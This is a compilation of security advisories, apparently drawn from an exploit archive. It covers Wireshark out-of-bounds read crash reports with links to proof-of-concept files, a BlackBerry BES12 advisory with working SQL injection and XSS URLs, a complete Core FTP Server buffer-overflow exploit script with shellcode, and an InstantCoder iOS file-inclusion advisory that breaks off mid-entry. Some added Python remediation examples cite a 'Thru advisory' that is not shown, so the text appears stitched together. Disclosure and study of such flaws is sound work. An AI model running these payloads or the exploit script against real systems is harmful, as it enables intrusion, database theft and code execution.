#68 0xaf3794 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#69 0xae5692 in call_dissector_work wireshark/epan/packet.c:691:9
#70 0xaefb1b in call_dissector_only wireshark/epan/packet.c:2662:8
#71 0xae09f3 in call_dissector_with_data wireshark/epan/packet.c:2675:8
#72 0x24dc752 in dissect_eth_common wireshark/epan/dissectors/packet-eth.c:545:5
#73 0x24d499a in dissect_eth_maybefcs wireshark/epan/dissectors/packet-eth.c:828:5
#74 0xaf3794 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#75 0xae5692 in call_dissector_work wireshark/epan/packet.c:691:9
#76 0xae4e1d in dissector_try_uint_new wireshark/epan/packet.c:1148:9
#77 0x25dca12 in dissect_frame wireshark/epan/dissectors/packet-frame.c:500:11
#78 0xaf3794 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#79 0xae5692 in call_dissector_work wireshark/epan/packet.c:691:9
#80 0xaefb1b in call_dissector_only wireshark/epan/packet.c:2662:8
#81 0xae09f3 in call_dissector_with_data wireshark/epan/packet.c:2675:8
#82 0xadffde in dissect_record wireshark/epan/packet.c:501:3
#83 0xab6d0d in epan_dissect_run_with_taps wireshark/epan/epan.c:373:2
#84 0x53c91b in process_packet wireshark/tshark.c:3728:5
#85 0x535d90 in load_cap_file wireshark/tshark.c:3484:11
#86 0x52c1df in main wireshark/tshark.c:2197:13
0x000005676c18 is located 8 bytes to the left of global variable '<string literal>' defined in '../../asn1/ansi_tcap/ansi_tcap.cnf:131:43' (0x5676c20) of size 15
'<string literal>' is ascii string 'queryWithPerm '
0x000005676c18 is located 24 bytes to the right of global variable 'T_paramSet_set' defined in '../../asn1/ansi_tcap/ansi_tcap.cnf:183:29' (0x5676be0) of size 32
SUMMARY: AddressSanitizer: global-buffer-overflow wireshark/epan/dissectors/packet-ber.c:2588:64 in dissect_ber_set
Shadow bytes around the buggy address:
0x000080ac6d30: 00 00 00 00 f9 f9 f9 f9 00 00 00 00 00 00 00 00
0x000080ac6d40: 00 00 00 00 00 00 00 f9 f9 f9 f9 f9 00 00 00 00
0x000080ac6d50: 00 00 00 00 00 00 00 00 00 00 00 00 f9 f9 f9 f9
0x000080ac6d60: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f9
0x000080ac6d70: f9 f9 f9 f9 00 00 00 00 f9 f9 f9 f9 00 00 00 00
=>0x000080ac6d80: f9 f9 f9[f9]00 07 f9 f9 f9 f9 f9 f9 00 00 00 00
0x000080ac6d90: 00 00 00 00 00 00 00 00 00 00 00 00 f9 f9 f9 f9
0x000080ac6da0: 00 00 02 f9 f9 f9 f9 f9 00 02 f9 f9 f9 f9 f9 f9
0x000080ac6db0: 00 00 06 f9 f9 f9 f9 f9 00 00 00 01 f9 f9 f9 f9
0x000080ac6dc0: 07 f9 f9 f9 f9 f9 f9 f9 00 00 00 00 00 00 00 00
0x000080ac6dd0: 00 00 00 00 00 00 00 00 f9 f9 f9 f9 00 00 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Heap right redzone: fb
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack partial redzone: f4
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==7855==ABORTING
--- cut ---
The crash was reported at https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=11796. Attached are three files which trigger the crash.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39484.zip
Source: https://code.google.com/p/google-security-research/issues/detail?id=654
The following crash due to an out-of-bounds read from static memory can be observed in an ASAN build of Wireshark (current git master), by feeding a malformed file to tshark ("$ ./tshark -nVxr /path/to/file"):
--- cut ---
==32475==ERROR: AddressSanitizer: global-buffer-overflow on address 0x7fd688698b10 at pc 0x7fd685351320 bp 0x7ffd862371a0 sp 0x7ffd86237198
READ of size 4 at 0x7fd688698b10 thread T0
#0 0x7fd68535131f in add_ff_vht_compressed_beamforming_report wireshark/epan/dissectors/packet-ieee80211.c:9143:8
#1 0x7fd68534746f in add_ff_action_vht wireshark/epan/dissectors/packet-ieee80211.c:9199:16
#2 0x7fd68533f813 in add_ff_action wireshark/epan/dissectors/packet-ieee80211.c:9426:12
#3 0x7fd685324811 in add_fixed_field wireshark/epan/dissectors/packet-ieee80211.c:9566:14
#4 0x7fd68536ebae in dissect_ieee80211_mgt wireshark/epan/dissectors/packet-ieee80211.c:16388:17
#5 0x7fd685368cce in dissect_ieee80211_common wireshark/epan/dissectors/packet-ieee80211.c:18218:7
#6 0x7fd685338dae in dissect_ieee80211 wireshark/epan/dissectors/packet-ieee80211.c:18375:10
#7 0x7fd6842c7cc1 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#8 0x7fd6842ba5ea in call_dissector_work wireshark/epan/packet.c:691:9
#9 0x7fd6842b9dbd in dissector_try_uint_new wireshark/epan/packet.c:1148:9
#10 0x7fd684fc95f6 in dissect_frame wireshark/epan/dissectors/packet-frame.c:500:11
#11 0x7fd6842c7cc1 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#12 0x7fd6842ba5ea in call_dissector_work wireshark/epan/packet.c:691:9
#13 0x7fd6842c42be in call_dissector_only wireshark/epan/packet.c:2662:8
#14 0x7fd6842b5ccf in call_dissector_with_data wireshark/epan/packet.c:2675:8
#15 0x7fd6842b533b in dissect_record wireshark/epan/packet.c:501:3
#16 0x7fd6842633c9 in epan_dissect_run_with_taps wireshark/epan/epan.c:373:2
#17 0x5264eb in process_packet wireshark/tshark.c:3728:5
#18 0x51f960 in load_cap_file wireshark/tshark.c:3484:11
#19 0x515daf in main wireshark/tshark.c:2197:13
0x7fd688698b10 is located 48 bytes to the left of global variable '<string literal>' defined in 'packet-ieee80211.c:9115:70' (0x7fd688698b40) of size 30
'<string literal>' is ascii string 'Average Signal to Noise Ratio'
0x7fd688698b10 is located 0 bytes to the right of global variable 'ns_arr' defined in 'packet-ieee80211.c:9091:20' (0x7fd688698ae0) of size 48
SUMMARY: AddressSanitizer: global-buffer-overflow wireshark/epan/dissectors/packet-ieee80211.c:9143:8 in add_ff_vht_compressed_beamforming_report
Shadow bytes around the buggy address:
0x0ffb510cb110: f9 f9 f9 f9 00 00 00 00 00 00 04 f9 f9 f9 f9 f9
0x0ffb510cb120: 00 00 00 07 f9 f9 f9 f9 00 00 07 f9 f9 f9 f9 f9
0x0ffb510cb130: 00 00 06 f9 f9 f9 f9 f9 00 00 00 00 00 03 f9 f9
0x0ffb510cb140: f9 f9 f9 f9 00 00 00 00 00 02 f9 f9 f9 f9 f9 f9
0x0ffb510cb150: 00 00 00 00 00 00 00 00 f9 f9 f9 f9 00 00 00 00
=>0x0ffb510cb160: 00 00[f9]f9 f9 f9 f9 f9 00 00 00 06 f9 f9 f9 f9
0x0ffb510cb170: 00 00 00 05 f9 f9 f9 f9 00 00 00 00 00 00 00 01
0x0ffb510cb180: f9 f9 f9 f9 00 00 04 f9 f9 f9 f9 f9 00 00 03 f9
0x0ffb510cb190: f9 f9 f9 f9 00 00 00 07 f9 f9 f9 f9 00 00 00 00
0x0ffb510cb1a0: 00 00 00 00 00 00 00 00 00 02 f9 f9 f9 f9 f9 f9
0x0ffb510cb1b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 f9 f9 f9
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Heap right redzone: fb
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack partial redzone: f4
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==32475==ABORTING
--- cut ---
The crash was reported at https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=11818. Attached are three files which trigger the crash.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39483.zip
( , ) (,
. '.' ) ('. ',
). , ('. ( ) (
(_,) .'), ) _ _,
/ _____/ / _ \ ____ ____ _____
\____ \==/ /_\ \ _/ ___\/ _ \ / \
/ \/ | \\ \__( <_> ) Y Y \
/______ /\___|__ / \___ >____/|__|_| /
\/ \/.-. \/ \/:wq
(x.0)
'=.|w|.='
_=''"''=.
presents..
BlackBerry Enterprise Service 12 (BES12) Self-Service
Affected versions: BES12 < 12.4
CVE: CVE-2016-1914 and CVE-2016-1915
PDF:
http://security-assessment.com/files/documents/advisory/Blackberry%20BES12%20Self-Service%20Multiple%20Vulnerabilities.pdf
+-----------+
|Description|
+-----------+
Blackberry BES12 is an enterprise mobile management solution and
contains a self-service web application available to mobile users. This
web application contains multiple vulnerabilities including unauthenticated SQL injection and reflected cross site scripting.
Limited access to an on-premise BES12 environment was provided during
the discovery of these vulnerabilities. The full impact of the
vulnerabilities in relation to compromising other portions of the BES12
solution, such as mobile devices, is unclear.
+------------+
|Exploitation|
+------------+
*SQL Injection*
The Java servlet com.rim.mdm.ui.server.ImageServlet is vulnerable to SQL
injection via the imageName parameter. This servlet is exposed at
multiple paths and is used to fetch an image from the database:
/mydevice/client/image
/admin/client/image
/myapps/client/image
/ssam/client/image
/all/client/image
This was discovered on a production BES12 on-premise deployment and the
injection vector allowed both UNION and stacked queries to be executed
on the Microsoft SQL server used by BES12. This allows full read/write
access to the database, and can potentially result in command execution
via xp_cmdshell depending on the database user configuration.
The following proof of concept demonstrates an injection payload which
will select the entire obj_keystore_entry table. The query will
serialise the entire table into an XML document which is returned in the
HTTP response as UTF-16 without the leading BOM (byte order mark)
causing most text editors to fail to display the response correctly.
https://<server>/mydevice/client/image?imageName=ui.cobranded.login.logo'+UNION+ALL+SELECT+NULL,NULL,NULL,NULL,NULL,(SELECT+*+FROM+obj_keystore_entry+FOR+XML+PATH(''))+--
The technique above can be used to download any database table available
to the BES12 database user.
Notable database tables are:
* obj_user which contains BES12 user details.
* obj_user_authentication which contains authentication tokens.
* obj_user_device which based on column names, contains enrolment
tokens, enrolment secrets and device encryption keys.
It is unclear if this information is sufficient to decrypt a lost/stolen
BES12 mobile device.
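Both the Thru advisory earlier on this page (sortorder and letterrange concatenated into the contact-sorting query) and the imageName injection here come from the same construction: request values spliced into SQL text. The Python below is an added example, not code from either product, built on an in-memory SQLite database with constructed tables: the vulnerable image lookup beside a bound-parameter version, and an allowlist for the ORDER BY column, where a bound parameter cannot be used. SQLite has no WAITFOR or FOR XML, so the MSSQL-specific parts of the two payloads are not reproduced; the UNION pattern is.

```python
import sqlite3

# Allowlist for ORDER BY: request value -> column name (identifiers cannot be bound)
SORT_COLUMNS = {"name": "name", "id": "id"}


def make_db() -> sqlite3.Connection:
    """Constructed in-memory schema standing in for the applications' databases."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE images(name TEXT, data TEXT);
        INSERT INTO images VALUES ('ui.cobranded.login.logo', 'PNG...');
        CREATE TABLE keystore(entry TEXT);
        INSERT INTO keystore VALUES ('private-key-material');
        CREATE TABLE contacts(id INTEGER, name TEXT);
        INSERT INTO contacts VALUES (1, 'bob'), (2, 'alice');
    """)
    return conn


def fetch_image_vulnerable(conn, image_name: str):
    """String concatenation: the value is parsed as SQL, so a closing quote
    plus UNION appends a second SELECT whose rows come back as image data."""
    sql = "SELECT data FROM images WHERE name = '" + image_name + "'"
    return [row[0] for row in conn.execute(sql)]


def fetch_image_safe(conn, image_name: str):
    """Bound parameter: the whole value is compared as data, never parsed."""
    return [row[0] for row in conn.execute("SELECT data FROM images WHERE name = ?", (image_name,))]


def sortorder_is_allowed(sortorder: str) -> bool:
    """Reject anything that is not one of the known sort keys before any SQL exists."""
    return sortorder in SORT_COLUMNS


def sorted_contacts_safe(conn, sortorder: str):
    """ORDER BY via the allowlist; the request string itself never reaches the SQL."""
    if not sortorder_is_allowed(sortorder):
        raise ValueError("unsupported sortorder: %r" % sortorder)
    sql = "SELECT name FROM contacts ORDER BY " + SORT_COLUMNS[sortorder]
    return [row[0] for row in conn.execute(sql)]


# Constructed payloads in the shape of the two advisories' requests.
UNION_PAYLOAD = "x' UNION ALL SELECT entry FROM keystore --"
STACKED_PAYLOAD = "1;WAITFOR DELAY '0:0:5'--"


if __name__ == "__main__":
    db = make_db()
    print("vulnerable lookup:", fetch_image_vulnerable(db, UNION_PAYLOAD))
    print("bound parameter  :", fetch_image_safe(db, UNION_PAYLOAD))
    print("sortorder allowed:", sortorder_is_allowed(STACKED_PAYLOAD))
```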
*Reflected Cross Site Scripting*
Two areas of the self-service web application exist where user-supplied
input is reflected directly in web pages, allowing a malicious user to
conduct Cross Site Scripting (XSS) attacks against users of the
application. While the application uses the HttpOnly cookie flag for
session tokens, successful exploitation allows malicious JavaScript to
perform any action within the application that the targeted user is able
to. The administrative web application is typically hosted on the same
domain and may be attacked using these XSS vectors, although this is
BES12 deployment specific.
The table below details where Cross Site Scripting was detected and
which parameters are vulnerable:
https://<server>/mydevice/index.jsp?locale="><script>alert(1)</script>
https://<server>/mydevice/loggedOut.jsp?locale="><script>alert(1)</script>
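The locale parameter above is reflected into the page markup unchanged. The Python below is an added example, not BlackBerry's code, showing the two layers that close this: validate the value against the shape of a locale tag, then attribute-encode it when rendering. The markup template and the payload string are constructed to mirror the URLs above.

```python
import html
import re

LOCALE_RE = re.compile(r"^[a-z]{2}(?:_[A-Z]{2})?$")   # e.g. "en" or "en_US"
DEFAULT_LOCALE = "en_US"


def render_vulnerable(locale: str) -> str:
    """Raw reflection into an attribute value, as the advisory's URLs imply."""
    return '<input type="hidden" name="locale" value="%s">' % locale


def validated_locale(locale: str) -> str:
    """Allowlist by shape: anything that is not a locale tag falls back to the default."""
    return locale if LOCALE_RE.match(locale) else DEFAULT_LOCALE


def attribute_encode(value: str) -> str:
    """Encode for an HTML attribute context so the value cannot close the attribute or tag."""
    return html.escape(value, quote=True)


def render_safe(locale: str) -> str:
    """Validate first, then encode: each layer is enough on its own for this payload."""
    return '<input type="hidden" name="locale" value="%s">' % attribute_encode(validated_locale(locale))


def contains_script_element(markup: str) -> bool:
    """Crude check for the demo: did a script element land in the rendered page?"""
    return "<script" in markup.lower()


XSS_PAYLOAD = '"><script>alert(1)</script>'   # constructed, same shape as the advisory's URLs


if __name__ == "__main__":
    print(render_vulnerable(XSS_PAYLOAD))
    print(render_safe(XSS_PAYLOAD))
    print(render_safe("de_DE"))
```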
+----------+
| Solution |
+----------+
Upgrade to BES12.4.
+-------------------+
|Disclosure Timeline|
+-------------------+
Initial disclosure to Blackberry – 19 Nov 2015
Disclosure receipt confirmed by Blackberry – 19 Nov 2015
Request for update from Blackberry – 7 Dec 2015
Vulnerabilities confirmed by Blackberry – 8 Dec 2015
Blackberry confirms fixes will be released as part of BES12.4 – 28 Jan 2016
BES12.4 released – 29 Jan 2016
Advisory released – 15 Feb 2016
+-----------------------------+
|About Security-Assessment.com|
+-----------------------------+
Security-Assessment.com is a leading team of Information Security
consultants specialising in providing high quality Information Security
services to clients throughout the Asia Pacific region. Our clients
include some of the largest globally recognised companies in areas such
as finance, telecommunications, broadcasting, legal and government. Our
aim is to provide the very best independent advice and a high level of
technical expertise while creating long and lasting professional
relationships with our clients.
Security-Assessment.com is committed to security research and
development, and its team continues to identify and responsibly publish
vulnerabilities in public and private software vendors' products.
Members of the Security-Assessment.com R&D team are globally recognised
through their release of whitepapers and presentations related to new
security research.
For further information on this issue or any of our service offerings,
contact us:
Web www.security-assessment.com
Email info@security-assessment.com
Source: https://code.google.com/p/google-security-research/issues/detail?id=656
The following crash due to an out-of-bounds read from static memory can be observed in an ASAN build of Wireshark (current git master), by feeding a malformed file to tshark ("$ ./tshark -nVxr /path/to/file"):
--- cut ---
==5092==ERROR: AddressSanitizer: global-buffer-overflow on address 0x7f72db15e078 at pc 0x7f72cffb364f bp 0x7ffe98a8b690 sp 0x7ffe98a8b688
READ of size 4 at 0x7f72db15e078 thread T0
#0 0x7f72cffb364e in dissect_oml_attrs wireshark/epan/dissectors/packet-gsm_abis_oml.c:1544:17
#1 0x7f72cffb3286 in dissect_oml_fom wireshark/epan/dissectors/packet-gsm_abis_oml.c:1799:11
#2 0x7f72cffb2cbe in dissect_abis_oml wireshark/epan/dissectors/packet-gsm_abis_oml.c:1861:13
#3 0x7f72cf121cc1 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#4 0x7f72cf1145ea in call_dissector_work wireshark/epan/packet.c:691:9
#5 0x7f72cf11e2be in call_dissector_only wireshark/epan/packet.c:2662:8
#6 0x7f72cf10fccf in call_dissector_with_data wireshark/epan/packet.c:2675:8
#7 0x7f72cf11e344 in call_dissector wireshark/epan/packet.c:2692:9
#8 0x7f72cffc53b7 in dissect_ipa wireshark/epan/dissectors/packet-gsm_ipa.c:333:5
#9 0x7f72cffc4dab in dissect_ipa_tcp wireshark/epan/dissectors/packet-gsm_ipa.c:376:2
#10 0x7f72cf121cc1 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#11 0x7f72cf1145ea in call_dissector_work wireshark/epan/packet.c:691:9
#12 0x7f72cf113dbd in dissector_try_uint_new wireshark/epan/packet.c:1148:9
#13 0x7f72d10c59dd in decode_tcp_ports wireshark/epan/dissectors/packet-tcp.c:4615:9
#14 0x7f72d10cb043 in process_tcp_payload wireshark/epan/dissectors/packet-tcp.c:4668:13
#15 0x7f72d10c639c in dissect_tcp_payload wireshark/epan/dissectors/packet-tcp.c:4743:9
#16 0x7f72d10db7a3 in dissect_tcp wireshark/epan/dissectors/packet-tcp.c:5575:13
#17 0x7f72cf121cc1 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#18 0x7f72cf1145ea in call_dissector_work wireshark/epan/packet.c:691:9
#19 0x7f72cf113dbd in dissector_try_uint_new wireshark/epan/packet.c:1148:9
#20 0x7f72d022188b in ip_try_dissect wireshark/epan/dissectors/packet-ip.c:2001:7
#21 0x7f72d022c2b9 in dissect_ip_v4 wireshark/epan/dissectors/packet-ip.c:2485:10
#22 0x7f72cf121cc1 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#23 0x7f72cf1145ea in call_dissector_work wireshark/epan/packet.c:691:9
#24 0x7f72cf113dbd in dissector_try_uint_new wireshark/epan/packet.c:1148:9
#25 0x7f72cf114964 in dissector_try_uint wireshark/epan/packet.c:1174:9
#26 0x7f72cfd3348d in dissect_ethertype wireshark/epan/dissectors/packet-ethertype.c:307:21
#27 0x7f72cf121cc1 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#28 0x7f72cf1145ea in call_dissector_work wireshark/epan/packet.c:691:9
#29 0x7f72cf11e2be in call_dissector_only wireshark/epan/packet.c:2662:8
#30 0x7f72cf10fccf in call_dissector_with_data wireshark/epan/packet.c:2675:8
#31 0x7f72cfd2f725 in dissect_eth_common wireshark/epan/dissectors/packet-eth.c:545:5
#32 0x7f72cfd27f33 in dissect_eth_maybefcs wireshark/epan/dissectors/packet-eth.c:828:5
#33 0x7f72cf121cc1 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#34 0x7f72cf1145ea in call_dissector_work wireshark/epan/packet.c:691:9
#35 0x7f72cf113dbd in dissector_try_uint_new wireshark/epan/packet.c:1148:9
#36 0x7f72cfe235f6 in dissect_frame wireshark/epan/dissectors/packet-frame.c:500:11
#37 0x7f72cf121cc1 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#38 0x7f72cf1145ea in call_dissector_work wireshark/epan/packet.c:691:9
#39 0x7f72cf11e2be in call_dissector_only wireshark/epan/packet.c:2662:8
#40 0x7f72cf10fccf in call_dissector_with_data wireshark/epan/packet.c:2675:8
#41 0x7f72cf10f33b in dissect_record wireshark/epan/packet.c:501:3
#42 0x7f72cf0bd3c9 in epan_dissect_run_with_taps wireshark/epan/epan.c:373:2
#43 0x5264eb in process_packet wireshark/tshark.c:3728:5
#44 0x51f960 in load_cap_file wireshark/tshark.c:3484:11
#45 0x515daf in main wireshark/tshark.c:2197:13
0x7f72db15e078 is located 0 bytes to the right of global variable 'nm_att_tlvdef_base' defined in 'packet-gsm_abis_oml.c:1356:30' (0x7f72db15d880) of size 2040
SUMMARY: AddressSanitizer: global-buffer-overflow wireshark/epan/dissectors/packet-gsm_abis_oml.c:1544:17 in dissect_oml_attrs
Shadow bytes around the buggy address:
0x0feedb623bb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0feedb623bc0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0feedb623bd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0feedb623be0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0feedb623bf0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x0feedb623c00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00[f9]
0x0feedb623c10: f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9
0x0feedb623c20: f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9
0x0feedb623c30: f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9
0x0feedb623c40: f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 00 00 00 00
0x0feedb623c50: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Heap right redzone: fb
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack partial redzone: f4
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==5092==ABORTING
--- cut ---
The crash was reported at https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=11825. Attached are three files which trigger the crash.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39482.zip
#-*- coding: utf-8 -*-
#
# Exploit Title : Core FTP Server v1.2 - BufferOverflow POC
# Date: 2016-02-22
# Author: INSECT.B
# Facebook : https://www.facebook.com/B.INSECT00
# GitHub : binsect00
# Blog : http://binsect00.tistory.com
# Vendor Homepage : http://www.coreftp.com/
# Software Link:
# Version: 1.2
# Tested on: Windows7 Professional SP1 En x86
# CVE : N/A
'''
[+] Type : Buffer overflow
[+] Detail :
[-] The vulnerability is a typical buffer overflow.
[-] Insert a string into the 'Log filename (include path)' field under [Setup] - [New] - [Logging options] - [More].
[-] The 'Log filename (include path)' field has no length limit and the input length is not checked.
[-] Insert the string "A"*1500 and press OK, OK.
[-] crash info
(3bc.e28): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000000 ebx=00000111 ecx=41414141 edx=0012a3d9 esi=00502438 edi=00000001
eip=41414141 esp=00129bf0 ebp=00129bf8 iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010202
41414141 ?? ???
'''
import struct
junk = "A" * 312
EIP = struct.pack("<L",0x7795163b) # USER32!gSharedInfo+0x181fb:
# 7795163b ffe4 jmp esp
nop = "\x90" * 10
#windows/exec calc.exe
#encode : alpha_mixed
sehll = (
"\x89\xe5\xdb\xde\xd9\x75\xf4\x59\x49\x49\x49\x49\x49\x49" +
"\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a" +
"\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41" +
"\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42" +
"\x75\x4a\x49\x59\x6c\x68\x68\x6f\x72\x67\x70\x77\x70\x47" +
"\x70\x75\x30\x6f\x79\x4a\x45\x44\x71\x49\x50\x30\x64\x6c" +
"\x4b\x56\x30\x34\x70\x4e\x6b\x61\x42\x56\x6c\x6c\x4b\x71" +
"\x42\x77\x64\x4c\x4b\x32\x52\x67\x58\x76\x6f\x6c\x77\x71" +
"\x5a\x31\x36\x65\x61\x49\x6f\x4e\x4c\x67\x4c\x53\x51\x61" +
"\x6c\x37\x72\x44\x6c\x47\x50\x4f\x31\x38\x4f\x54\x4d\x36" +
"\x61\x58\x47\x58\x62\x69\x62\x46\x32\x51\x47\x6c\x4b\x61" +
"\x42\x46\x70\x6c\x4b\x52\x6a\x75\x6c\x6e\x6b\x42\x6c\x34" +
"\x51\x30\x78\x79\x73\x72\x68\x65\x51\x7a\x71\x30\x51\x6c" +
"\x4b\x53\x69\x57\x50\x43\x31\x58\x53\x4c\x4b\x62\x69\x76" +
"\x78\x58\x63\x75\x6a\x37\x39\x4c\x4b\x75\x64\x6c\x4b\x36" +
"\x61\x4e\x36\x54\x71\x69\x6f\x6e\x4c\x5a\x61\x5a\x6f\x54" +
"\x4d\x43\x31\x58\x47\x45\x68\x59\x70\x32\x55\x4b\x46\x64" +
"\x43\x51\x6d\x58\x78\x45\x6b\x31\x6d\x55\x74\x50\x75\x48" +
"\x64\x42\x78\x6c\x4b\x32\x78\x77\x54\x67\x71\x38\x53\x63" +
"\x56\x4c\x4b\x66\x6c\x62\x6b\x6e\x6b\x52\x78\x35\x4c\x63" +
"\x31\x68\x53\x6e\x6b\x45\x54\x4c\x4b\x46\x61\x5a\x70\x6c" +
"\x49\x47\x34\x65\x74\x31\x34\x61\x4b\x31\x4b\x75\x31\x43" +
"\x69\x52\x7a\x36\x31\x6b\x4f\x59\x70\x73\x6f\x63\x6f\x32" +
"\x7a\x4c\x4b\x45\x42\x78\x6b\x6e\x6d\x43\x6d\x31\x7a\x63" +
"\x31\x6c\x4d\x6c\x45\x4e\x52\x75\x50\x77\x70\x47\x70\x50" +
"\x50\x63\x58\x66\x51\x4e\x6b\x62\x4f\x6b\x37\x6b\x4f\x7a" +
"\x75\x6f\x4b\x4c\x30\x68\x35\x6f\x52\x61\x46\x43\x58\x69" +
"\x36\x7a\x35\x4d\x6d\x4f\x6d\x69\x6f\x68\x55\x65\x6c\x56" +
"\x66\x33\x4c\x37\x7a\x4d\x50\x49\x6b\x79\x70\x51\x65\x37" +
"\x75\x4f\x4b\x31\x57\x75\x43\x61\x62\x70\x6f\x73\x5a\x73" +
"\x30\x46\x33\x39\x6f\x6a\x75\x70\x63\x45\x31\x42\x4c\x63" +
"\x53\x74\x6e\x71\x75\x31\x68\x73\x55\x57\x70\x41\x41"
)
payload = junk + EIP + nop + sehll
with open("CoreFTPServer_Ex.txt","wb") as f :
    f.write(payload)
Document Title:
===============
InstantCoder v1.0 iOS - Multiple Web Vulnerabilities
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1738
Release Date:
=============
2016-02-22
Vulnerability Laboratory ID (VL-ID):
====================================
1738
Common Vulnerability Scoring System:
====================================
7
Product & Service Introduction:
===============================
You are one of the best developers in the world and you would like to code anytime, anywhere. CuteCoder makes it possible
for you to code and debug web apps on your lovely iPhone and iPad.
(Copy of the Homepage: https://itunes.apple.com/ai/app/instantcoder/id1067517686 )
Abstract Advisory Information:
==============================
The Vulnerability Laboratory Core Research Team discovered multiple vulnerabilities in the official InstantCoder mobile iOS web-application.
Vulnerability Disclosure Timeline:
==================================
2016-02-22: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
Shumin Sun
Product: InstantCoder - iOS (Web-Application) 1.0
Exploitation Technique:
=======================
Remote
Severity Level:
===============
High
Technical Details & Description:
================================
1.1
A local file include web vulnerability has been discovered in the official InstantCoder v1.0 iOS mobile web-application (wifi).
The file include vulnerability allows remote attackers to include local file/path requests or system-specific path commands
without authorization and thereby compromise the mobile web-application.
The web vulnerability is located in the `filename` value of the `./toolkit/upload` module. Remote attackers are able to inject their own
files with malicious `filename` values in the `file upload` POST method request to compromise the mobile web-application. The local
file/path include executes in the index file directory listing and sub folders of the wifi interface. The attacker is able to
inject the LFI payload by using the wifi interface or the local file sync function.
Attackers are also able to exploit the filename issue in combination with persistently injected script code to execute different malicious
attack requests. The attack vector is located on the application side of the wifi service and the request method to inject is POST.
The security risk of the local file include vulnerability is estimated as high with a CVSS (Common Vulnerability Scoring System) count of 6.4.
Exploitation of the local file include web vulnerability requires no user interaction or privileged web-application user account.
Successful exploitation of the local file include vulnerability results in mobile application compromise or connected device component compromise.
Request Method(s):
[+] [POST]
Vulnerable Module(s):
[+] ./toolkit/upload
Vulnerable Parameter(s):
[+] filename
Affected Module(s):
[+] Index File Dir Listing (http://localhost:8080/)
1.2
A directory traversal web vulnerability has been discovered in the official InstantCoder v1.0 iOS mobile web-application (wifi).
The vulnerability allows remote attackers to access path variables without authorization and compromise the web-application or mobile device.
The directory traversal web vulnerability is located in the `path` value of the `listFiles` module. Remote attackers are able to
manipulate the path variable in a GET or POST method request to compromise the application. The request method to inject the payload is
POST and the request method to execute is GET. The attack vector of the vulnerability is located on the application side. The path
variable is neither encoded nor parsed, which allows an attacker to inject a payload and gain unauthorized access to the local system or app path.
The security risk of the path traversal vulnerability is estimated as high with a CVSS (Common Vulnerability Scoring System) count of 7.0.
Exploitation of the local file include web vulnerability requires no user interaction or privileged web-application (wifi ui) user account.
Successful exploitation of the path traversal vulnerability results in mobile application compromise or compromise of connected device components.
Request Method(s):
[+] [POST]
Vulnerable Module(s):
[+] ./listFiles
